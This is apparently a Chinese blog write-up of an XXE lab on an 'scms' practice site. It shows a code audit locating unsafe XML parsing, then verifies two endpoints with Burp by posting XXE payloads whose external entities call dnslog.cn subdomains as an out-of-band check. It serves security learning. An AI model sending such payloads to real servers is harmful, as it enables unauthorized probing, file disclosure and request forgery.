当前位置: 首页 > news >正文

xxe漏洞之scms靶场漏洞

news 2025/7/15 14:11:48

xxe-scms

  1. 代码审核

(1)全局搜索simplexml_load_string

simplexml_load_string--将XML字符串解释为对象

(2)查看源代码

ID=1

$GLOBALS['HTTP_RAW_POST_DATA']就相当于file_get_contents("php://input");

因此这里就存在xxe漏洞

ID=6

这里也出现了file_get_contents("php://input");

因此也存在xxe漏洞

2.验证xxe漏洞

(1)/api/notify.php

找到漏洞点位置

www.scms.com/api/notify.php

用burp抓包输入代码得到

将get改为post

输入

<?xml version = "1.0" encoding="UTF-8"?>

<!DOCTYPE ANY [

<!ENTITY xxe SYSTEM "http://gao.xkgyim.dnslog.cn">

]>

<x>&xxe;</x>

打开dnslog

成功写入证明漏洞验证成功

(2)weixin/index.php

与上述同理先访问漏洞点

www.scms.com/weixin/index.php

再用burp抓包

将get改为post

输入

<?xml version="1.0" encoding="UTF-8" ?>

<!DOCTYPE root[

<!ENTITY name SYSTEM "http://gao.uqli55.dnslog.cn">]>

<root>

<username>&name;</username>

</root>

http://www.lryc.cn/news/286564.html

相关文章:

  • Unity3d C#实现三维场景中图标根据相机距离动态缩放功能
  • Linux网络编程(二-套接字)
  • 【DeepLearning-1】 注意力机制(Attention Mechanism)
  • c++:string相关的oj题(415. 字符串相加、125. 验证回文串、541. 反转字符串 II、557. 反转字符串中的单词 III)
  • HuoCMS|免费开源可商用CMS建站系统HuoCMS 2.0下载(thinkphp内核)
  • VsCode + CMake构建项目 C/C++连接Mysql数据库 | 数据库增删改查C++封装 | 信息管理系统通用代码 ---- 课程笔记
  • HackTheBox - Medium - Linux - Ransom
  • 柠檬微趣面试准备
  • uniapp嵌套webview,无法返回上一级?
  • 【优先级队列 之 堆的实现】
  • Vue中$watch()方法和watch属性的区别
  • openssl3.2 - 官方demo学习 - test - certs - 001 - Primary root: root-cert
  • 小程序商城能不能自己开发?
  • GPTBots:利用FlowBot中的卡片和表单信息,提供丰富的客服体验
  • ERC20 解读
  • C#,入门教程(31)——预处理指令的基础知识与使用方法
  • Java SE:面向对象(下)
  • 搭建开源数据库中间件MyCat2-配置mysql数据库双主双从
  • Oracle 19c rac集群管理 -------- 集群启停操作过程
  • 【Java】HttpServlet类中前后端交互三种方式(query string、form表单、JSON字符串)
  • 【深蓝学院】移动机器人运动规划--第2章 基于搜索的路径规划--笔记
  • 安装向量数据库milvus可视化工具attu
  • STM32标准库开发——串口发送/单字节接收
  • jdk17新特性——文本块(即多行的字符串)增强
  • 阿里云ECS使用docker搭建mysql服务
  • Windows给docker设置阿里源
  • 安裝火狐和穀歌流覽器插件FoxyProxy管理海外動態IP代理
  • C++重新入门-函数重载
  • niushop靶场漏洞查找-文件上传漏洞等(超详细)
  • Bit Extraction and Bootstrapping for BGV/BFV